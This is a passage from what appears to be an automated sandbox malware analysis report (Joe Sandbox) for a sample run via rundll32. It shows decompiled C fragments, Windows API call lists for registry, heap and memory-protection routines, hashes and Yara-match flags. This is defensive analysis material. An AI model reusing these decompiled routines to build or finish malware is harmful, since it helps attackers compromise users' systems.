                          					if(_t31 == 0 && _t25 != 0) {
                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                          					}
                          					if(_t28 != 0 && _t31 != 0) {
                          						 *_t28 =  *_t28 & 0xfffffffe;
                          					}
                          					goto L20;
                          				} else {
                          					_t18 = E010068BD(); // executed
                          					if(_t18 != 0) {
                          						goto L12;
                          					}
                          					_t19 = StrChrW( *_t32, 0x20);
                          					if(_t19 != 0) {
                          						 *_t19 = 0;
                          						_t19 =  &(_t19[1]);
                          					}
                          					_t20 = E01007928(0,  *_t32, _t19, 0); // executed
                          					_t31 = _t20;
                          					if(_t31 == 0) {
                          						if(_t25 == 0) {
                          							L22:
                          							return _t31;
                          						}
                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                          						if(_t31 == 0) {
                          							L20:
                          							if(_t25 != 0) {
                          								FindCloseChangeNotification(_t25); // executed
                          							}
                          							goto L22;
                          						}
                          					}
                          					goto L12;
                          				}
                          			}

                          APIs
                            • Part of subcall function 010011C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05299D70,00000000,?,?,69B25F44,00000005,0100A00C,4D283A53,?,?), ref: 010011F9
                            • Part of subcall function 010011C3: lstrcpy.KERNEL32(00000000,00000000), ref: 0100121D
                            • Part of subcall function 010011C3: lstrcat.KERNEL32(00000000,00000000), ref: 01001225
                          • CreateEventA.KERNEL32(0100A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,01007187,?,?,?), ref: 010049CF
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • StrChrW.SHLWAPI(01007187,00000020,61636F4C,00000001,00000000,?,?,00000000,?,01007187,?,?,?), ref: 01004A02
                          • WaitForSingleObject.KERNEL32(00000000,00004E20,01007187,00000000,00000000,?,00000000,?,01007187,?,?,?), ref: 01004A2F
                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,01007187,?,?,?), ref: 01004A5D
                          • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,01007187,?,?,?), ref: 01004A75
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                          • String ID:
                          • API String ID: 3294472205-0
                          • Opcode ID: 720b76b5c537524811e4f9795bde7260738c5bac5dfa1b63bf75861de9a4507a
                          • Instruction ID: 5d65becdba536d9e68b0c4cf54868bbc345e63c73fcb538be02e81fa7274f8b0
                          • Opcode Fuzzy Hash: 720b76b5c537524811e4f9795bde7260738c5bac5dfa1b63bf75861de9a4507a
                          • Instruction Fuzzy Hash: 0A215432600301ABF3339F6C9C44AAA76E9EB8A711F054665FFC1E71C5DB66D880879C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7B7A4: RegCreateKeyA.ADVAPI32(80000001,05FBB7F0,?), ref: 05B7B7B9
                            • Part of subcall function 05B7B7A4: lstrlen.KERNEL32(05FBB7F0,00000000,00000000,00000000,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008,00000003), ref: 05B7B7E2
                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F4C
                          • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                          • String ID:
                          • API String ID: 1633053242-0
                          • Opcode ID: db12866386a262a24507c32316ff6b74bb1e8efb0fb932b3b3bd1d781e8359cd
                          • Instruction ID: 57141cc42c17bcd2d6475f7e253fbf29547f8afc83743c4780313e15e81cdc99
                          • Opcode Fuzzy Hash: db12866386a262a24507c32316ff6b74bb1e8efb0fb932b3b3bd1d781e8359cd
                          • Instruction Fuzzy Hash: 931123B2110149BFDF01AF98DC85CBE7B6EFB88254B101466FA05A3210EB31AD55EB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,05B6111D,00000000), ref: 05B7214D
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B72166
                          • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,05B6111D,00000000), ref: 05B72183
                          • IsWow64Process.KERNEL32(?,?,?,?,?,?,05B6111D,00000000), ref: 05B72194
                          • FindCloseChangeNotification.KERNEL32(?,?,?,?,05B6111D,00000000), ref: 05B721A7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                          • String ID:
                          • API String ID: 1712524627-0
                          • Opcode ID: d73e45c306ee1b24e0e7d23bd0418119e7ad78a0a0476ac2cc3544becec74940
                          • Instruction ID: 9db4a36e846a49b2a7cbed61943e127ce4db07578d3162c237c87d2267257067
                          • Opcode Fuzzy Hash: d73e45c306ee1b24e0e7d23bd0418119e7ad78a0a0476ac2cc3544becec74940
                          • Instruction Fuzzy Hash: F2015E75514208FFDB11EF55D8498BDBFB9FB856A1B305166FA05D3200EB347602CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 05B633CA
                          • GetLastError.KERNEL32(?,00000000), ref: 05B633D2
                          • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 05B633E9
                          • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 05B6340E
                          • SetLastError.KERNEL32(80000000,?,00000000), ref: 05B63417
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$ErrorLastProtect$Query
                          • String ID:
                          • API String ID: 148356745-0
                          • Opcode ID: 64305adc0db543dc23a852f07b00decfdb12b8ed64a33ef93d80c45ddaed863b
                          • Instruction ID: 24e215e1fb9a0b836789bbc3213b22fdc226e1d2d679e4bb3f27362a0e7c7ee2
                          • Opcode Fuzzy Hash: 64305adc0db543dc23a852f07b00decfdb12b8ed64a33ef93d80c45ddaed863b
                          • Instruction Fuzzy Hash: BA012572500209BFDF12AF95DC458AEBFBAFF092547008426FA01E3260EB71E914DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SysAllocString.OLEAUT32(80000002), ref: 0100755B
                          • SysAllocString.OLEAUT32(01003520), ref: 0100759F
                          • SysFreeString.OLEAUT32(00000000), ref: 010075B3
                          • SysFreeString.OLEAUT32(00000000), ref: 010075C1
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$AllocFree
                          • String ID:
                          • API String ID: 344208780-0
                          • Opcode ID: fb39ea3c97681e4de0a733d66f83c8c59df61b4a41ffc3a00e4bc55cf5868361
                          • Instruction ID: 80d11c0df2f7633d36f0683171aff4fd2ebec0bb4e30d7475be179f93a7235d8
                          • Opcode Fuzzy Hash: fb39ea3c97681e4de0a733d66f83c8c59df61b4a41ffc3a00e4bc55cf5868361
                          • Instruction Fuzzy Hash: 53313F75900249EFDB16CF98D4809EE7BB5FF48301F10842EFA8597251D775A641CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 41%
                          			E010070D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                          				intOrPtr _v12;
                          				void* _v16;
                          				void* _v28;
                          				char _v32;
                          				void* __esi;
                          				void* _t20;
                          				void* _t26;
                          				void* _t29;
                          				void* _t38;
                          				signed int* _t39;
                          				void* _t40;
                          
                          				_t36 = __ecx;
                          				_v32 = 0;
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				_v12 = _a4;
                          				_t20 = E010054BB(__ecx,  &_v32); // executed
                          				_t38 = _t20;
                          				if(_t38 != 0) {
                          					L12:
                          					_t39 = _a8;
                          					L13:
                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                          						_t23 =  &(_t39[1]);
                          						if(_t39[1] != 0) {
                          							E010078BF(_t23);
                          						}
                          					}
                          					return _t38;
                          				}
                          				_t26 = E01003695(0x40,  &_v16); // executed
                          				if(_t26 != 0) {
                          					_v16 = 0;
                          				}
                          				_t40 = CreateEventA(0x100a34c, 1, 0,  *0x100a3e4);
                          				if(_t40 != 0) {
                          					SetEvent(_t40);
                          					Sleep(0xbb8); // executed
                          					CloseHandle(_t40);
                          				}
                          				_push( &_v32);
                          				if(_a12 == 0) {
                          					_t29 = E010071B6(_t36); // executed
                          				} else {
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					_t29 = E01003472(_t36);
                          				}
                          				_t41 = _v16;
                          				_t38 = _t29;
                          				if(_v16 != 0) {
                          					E01003AC2(_t41);
                          				}
                          				if(_t38 != 0) {
                          					goto L12;
                          				} else {
                          					_t39 = _a8;
                          					_t38 = E0100498E( &_v32, _t39);
                          					goto L13;
                          				}
                          			}

                          APIs
                          • CreateEventA.KERNEL32(0100A34C,00000001,00000000,00000040,?,?,76CDF710,00000000,76CDF730), ref: 01007129
                          • SetEvent.KERNEL32(00000000), ref: 01007136
                          • Sleep.KERNEL32(00000BB8), ref: 01007141
                          • CloseHandle.KERNEL32(00000000), ref: 01007148
                            • Part of subcall function 010071B6: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01007168,?), ref: 010071DC
                            • Part of subcall function 010071B6: RegEnumKeyExA.KERNEL32(?,?,?,01007168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01007168), ref: 01007223
                            • Part of subcall function 010071B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,01007168,?,01007168,?,?,?,?,?,01007168,?), ref: 01007290
                            • Part of subcall function 010071B6: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01007168,?), ref: 010072B8
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                          • String ID:
                          • API String ID: 891522397-0
                          • Opcode ID: ce29f804878d62b2be14f549f8c7a8f14321abeee0451be8d898b6c470d976d1
                          • Instruction ID: d76f88c1b583bee4e8d37101020a92bc72955a85571000fa45478a4a0076cbf4
                          • Opcode Fuzzy Hash: ce29f804878d62b2be14f549f8c7a8f14321abeee0451be8d898b6c470d976d1
                          • Instruction Fuzzy Hash: 7C219872D00119AFFB23AFEC8884CDE77BAAB44250F054465EBD1A71C0DB39A94587A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E010012CA(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                          				long _t26;
                          				intOrPtr* _t38;
                          				char* _t42;
                          				long _t43;
                          
                          				if(_a4 == 0) {
                          					L2:
                          					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                          					_t43 = _t26;
                          					if(_t43 == 0) {
                          						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                          						if(_a4 == 0) {
                          							_t43 = 0xe8;
                          						} else {
                          							_t42 = E01006D63(_a4);
                          							if(_t42 == 0) {
                          								_t43 = 8;
                          							} else {
                          								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                          								if(_t43 != 0) {
                          									E01006C2C(_t42);
                          								} else {
                          									 *_a20 = _t42;
                          									_t38 = _a24;
                          									if(_t38 != 0) {
                          										 *_t38 = _a4;
                          									}
                          								}
                          							}
                          						}
                          						RegCloseKey(_a12); // executed
                          					}
                          					L12:
                          					return _t43;
                          				}
                          				_t43 = E01006500(_a4, _a8, _a12, _a16, _a20, _a24);
                          				if(_t43 == 0) {
                          					goto L12;
                          				}
                          				goto L2;
                          			}

                          APIs
                          • RegOpenKeyW.ADVAPI32(80000002,05299E92,05299E92), ref: 01001303
                          • RegQueryValueExW.KERNEL32(05299E92,?,00000000,80000002,00000000,00000000,?,01003551,3D010090,80000002,01007168,00000000,01007168,?,05299E92,80000002), ref: 01001325
                          • RegQueryValueExW.ADVAPI32(05299E92,?,00000000,80000002,00000000,00000000,00000000,?,01003551,3D010090,80000002,01007168,00000000,01007168,?,05299E92), ref: 0100134A
                          • RegCloseKey.KERNEL32(05299E92,?,01003551,3D010090,80000002,01007168,00000000,01007168,?,05299E92,80000002,00000000,?), ref: 0100137A
                            • Part of subcall function 01006500: SafeArrayDestroy.OLEAUT32(00000000), ref: 01006588
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                          • String ID:
                          • API String ID: 486277218-0
                          • Opcode ID: e5dd0c790a7d478e93b2a4a600edf3112b34c55c24cdebc1d885f260d14082a3
                          • Instruction ID: 24aee36448e8392d665b92bfddab46906dfd6a88f358cb79d7cd6e168e8b5f6c
                          • Opcode Fuzzy Hash: e5dd0c790a7d478e93b2a4a600edf3112b34c55c24cdebc1d885f260d14082a3
                          • Instruction Fuzzy Hash: 3B213C7250411EBFEF229F94DC80CEE7BA9FB04390F008426FE55975A0D632DD609B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,05B662DD,?,?,?,?), ref: 05B79686
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05B7969D
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,05B662DD,?,?,?,?,?,?,00000000), ref: 05B796B8
                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,05B662DD,?,?,?,?), ref: 05B796D7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapQueryValue$AllocateFree
                          • String ID:
                          • API String ID: 4267586637-0
                          • Opcode ID: 06922e95216afe396c1dc8898d19d4a65a46377155bec2e3abc26e07a715f7db
                          • Instruction ID: 8ac7da5845b98ded7fc30be9ef446124780b7df5f7b5a97f496926e3c8b05974
                          • Opcode Fuzzy Hash: 06922e95216afe396c1dc8898d19d4a65a46377155bec2e3abc26e07a715f7db
                          • Instruction Fuzzy Hash: 10113AB651011CFFDB12DF94DC85CEEBBBEEB89360B104196F911A7210E671AE40EB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,05B8A170,00000000,05B75D81,?,05B6F2F7,?), ref: 05B671D3
                          • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,05B8A170,00000000,05B75D81,?,05B6F2F7,?), ref: 05B671DE
                          • _wcsupr.NTDLL ref: 05B671EB
                          • lstrlenW.KERNEL32(00000000), ref: 05B671F3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                          • String ID:
                          • API String ID: 2533608484-0
                          • Opcode ID: cc3f0f312c97c138d8a9ecbcbac639838af878579f2b1b7af3daba35f5a63d32
                          • Instruction ID: 90c16d2a20e53997b98c49056f6ce0c0f0bb18d66e209083b08864b0676e0cb5
                          • Opcode Fuzzy Hash: cc3f0f312c97c138d8a9ecbcbac639838af878579f2b1b7af3daba35f5a63d32
                          • Instruction Fuzzy Hash: 16F0E9322151102BD3127A759C8DE7F5B5EFF82AA972018A9F606D3140DE68FC01C5A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05B7C3A3
                            • Part of subcall function 05B68FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 05B68FBA
                            • Part of subcall function 05B68FAE: CloseHandle.KERNEL32(?), ref: 05B68FC8
                            • Part of subcall function 05B68FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B68FE4
                          • CloseHandle.KERNEL32(?), ref: 05B7C3B1
                          • InterlockedDecrement.KERNEL32(05B8A05C), ref: 05B7C3C0
                            • Part of subcall function 05B7E831: SetEvent.KERNEL32(000005BC,05B7C3DB), ref: 05B7E83B
                            • Part of subcall function 05B7E831: CloseHandle.KERNEL32(000005BC), ref: 05B7E850
                            • Part of subcall function 05B7E831: HeapDestroy.KERNELBASE(05BC0000), ref: 05B7E860
                          • RtlExitUserThread.NTDLL(00000000), ref: 05B7C3DC
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                          • String ID:
                          • API String ID: 1141245775-0
                          • Opcode ID: d1e4d1aed871961306d89e8b46d225a0344418a31f56c2f400cb9058e8283427
                          • Instruction ID: 2b6b32a8c6d093949c269d7631fe220296d3dce2dfc3d6a5a2f4cf4d7778f684
                          • Opcode Fuzzy Hash: d1e4d1aed871961306d89e8b46d225a0344418a31f56c2f400cb9058e8283427
                          • Instruction Fuzzy Hash: 9FF03C31650208BFD7116B68984AE7E3F7AFF42730B611299F525972C0EB74B901CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 50%
                          			E0100765B(void** __esi) {
                          				intOrPtr _v0;
                          				intOrPtr _t4;
                          				intOrPtr _t6;
                          				void* _t8;
                          				void* _t9;
                          				intOrPtr _t10;
                          				void* _t11;
                          				void** _t13;
                          
                          				_t13 = __esi;
                          				_t4 =  *0x100a3cc; // 0x52995b0
                          				__imp__(_t4 + 0x40);
                          				while(1) {
                          					_t6 =  *0x100a3cc; // 0x52995b0
                          					_t1 = _t6 + 0x58; // 0x0
                          					if( *_t1 == 0) {
                          						break;
                          					}
                          					Sleep(0xa);
                          				}
                          				_t8 =  *_t13;
                          				if(_t8 != 0 && _t8 != 0x100a030) {
                          					HeapFree( *0x100a2d8, 0, _t8);
                          				}
                          				_t9 = E01006E6D(_v0, _t13); // executed
                          				_t13[1] = _t9;
                          				_t10 =  *0x100a3cc; // 0x52995b0
                          				_t11 = _t10 + 0x40;
                          				__imp__(_t11);
                          				return _t11;
                          			}

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05299570), ref: 01007664
                          • Sleep.KERNEL32(0000000A), ref: 0100766E
                          • HeapFree.KERNEL32(00000000,00000000), ref: 01007696
                          • RtlLeaveCriticalSection.NTDLL(05299570), ref: 010076B2
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                          • String ID:
                          • API String ID: 58946197-0
                          • Opcode ID: a6bb0fe7a6e4c6f2f4b82ec68a026bf6a17addb1aae8e562a6f1034c1a6699ef
                          • Instruction ID: b0c9ff4ed375b97583d44f0b00b36c6cf36e92ad7067fb3a4f16a156acfdc3df
                          • Opcode Fuzzy Hash: a6bb0fe7a6e4c6f2f4b82ec68a026bf6a17addb1aae8e562a6f1034c1a6699ef
                          • Instruction Fuzzy Hash: 87F0B271300242DFE7229B68DC48A1A3BE8AB14744F049454B6CAD72A6C62AE850CB25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000003.00000002.506070289.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_d20000_rundll32.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: X
                          • API String ID: 544645111-3081909835
                          • Opcode ID: a0a19b89f86dbda0f467e9c45e2967a6237675e2b94d60135d57628e7d7484b3
                          • Instruction ID: 3731eabe9e70265f4ee8b9ff8a6cfcbcc4ce3fe2d854fc2b89788c7bd78ee404
                          • Opcode Fuzzy Hash: a0a19b89f86dbda0f467e9c45e2967a6237675e2b94d60135d57628e7d7484b3
                          • Instruction Fuzzy Hash: 9351B8B8E043188FDB14CF99C480A9DFBB1FF98314F25856AE919AB356C730A845CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01001CD6(signed int __edx, intOrPtr _a4) {
                          				void* _t3;
                          				void* _t5;
                          				void* _t7;
                          				void* _t8;
                          				void* _t9;
                          				signed int _t10;
                          
                          				_t10 = __edx;
                          				_t3 = HeapCreate(0, 0x400000, 0); // executed
                          				 *0x100a2d8 = _t3;
                          				if(_t3 == 0) {
                          					_t8 = 8;
                          					return _t8;
                          				}
                          				 *0x100a1c8 = GetTickCount();
                          				_t5 = E01006D78(_a4);
                          				if(_t5 == 0) {
                          					_t5 = E01004B89(_t9, _a4); // executed
                          					if(_t5 == 0) {
                          						if(E01006B1C(_t9) != 0) {
                          							 *0x100a300 = 1; // executed
                          						}
                          						_t7 = E01003D2C(_t10); // executed
                          						return _t7;
                          					}
                          				}
                          				return _t5;
                          			}

                          APIs
                          • HeapCreate.KERNEL32(00000000,00400000,00000000,01005E54,?), ref: 01001CDF
                          • GetTickCount.KERNEL32 ref: 01001CF3
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CountCreateHeapTick
                          • String ID: nFm@
                          • API String ID: 2177101570-673577508
                          • Opcode ID: 0ed08f84d732c5803febc9d95ca3f21493158de358889a85fd2974c0de14fad1
                          • Instruction ID: f6d838dd0fb60614e9efcc18499a37be61e04bbfd53a71068add3f78f0be5ebb
                          • Opcode Fuzzy Hash: 0ed08f84d732c5803febc9d95ca3f21493158de358889a85fd2974c0de14fad1
                          • Instruction Fuzzy Hash: 1BF06DB0640702AAFB637B74AD04B5A3AE47B20784F104826F9C4D50C6EBBAC0409726
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B7A477
                          • memcpy.NTDLL ref: 05B7A49F
                            • Part of subcall function 05B77950: NtAllocateVirtualMemory.NTDLL(05B7EB0F,00000000,00000000,05B7EB0F,00003000,00000040), ref: 05B77981
                            • Part of subcall function 05B77950: RtlNtStatusToDosError.NTDLL(00000000), ref: 05B77988
                            • Part of subcall function 05B77950: SetLastError.KERNEL32(00000000), ref: 05B7798F
                          • GetLastError.KERNEL32(00000010,00000218,05B8386D,00000100,?,00000318,00000008), ref: 05B7A4B6
                          • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,05B8386D,00000100), ref: 05B7A599
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                          • String ID:
                          • API String ID: 685050087-0
                          • Opcode ID: 80f60978f73c43e93e711b1cb2e24cf3ec568e0bd3954b4543244117e6902d58
                          • Instruction ID: cc21fb93d5530a6b90278fcb9752d71d9126ed35a635937eb608e4f0edcebb72
                          • Opcode Fuzzy Hash: 80f60978f73c43e93e711b1cb2e24cf3ec568e0bd3954b4543244117e6902d58
                          • Instruction Fuzzy Hash: 864160B1604705AFD761DF24DC45FABBBE9FB48710F008A6DF5A9C6290E730E5148BA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0100216C(void* __edx) {
                          				void* _v8;
                          				int _v12;
                          				WCHAR* _v16;
                          				void* __edi;
                          				void* __esi;
                          				void* _t23;
                          				intOrPtr _t24;
                          				void* _t26;
                          				intOrPtr _t32;
                          				intOrPtr _t35;
                          				void* _t37;
                          				intOrPtr _t38;
                          				intOrPtr _t42;
                          				void* _t45;
                          				void* _t50;
                          				void* _t52;
                          
                          				_t50 = __edx;
                          				_v12 = 0;
                          				_t23 = E01003695(0,  &_v8); // executed
                          				if(_t23 != 0) {
                          					_v8 = 0;
                          				}
                          				_t24 =  *0x100a348; // 0x428d5a8
                          				_t4 = _t24 + 0x100be58; // 0x5299400
                          				_t5 = _t24 + 0x100be00; // 0x4f0053
                          				_t26 = E0100155C( &_v16, _v8, _t5, _t4); // executed
                          				_t45 = _t26;
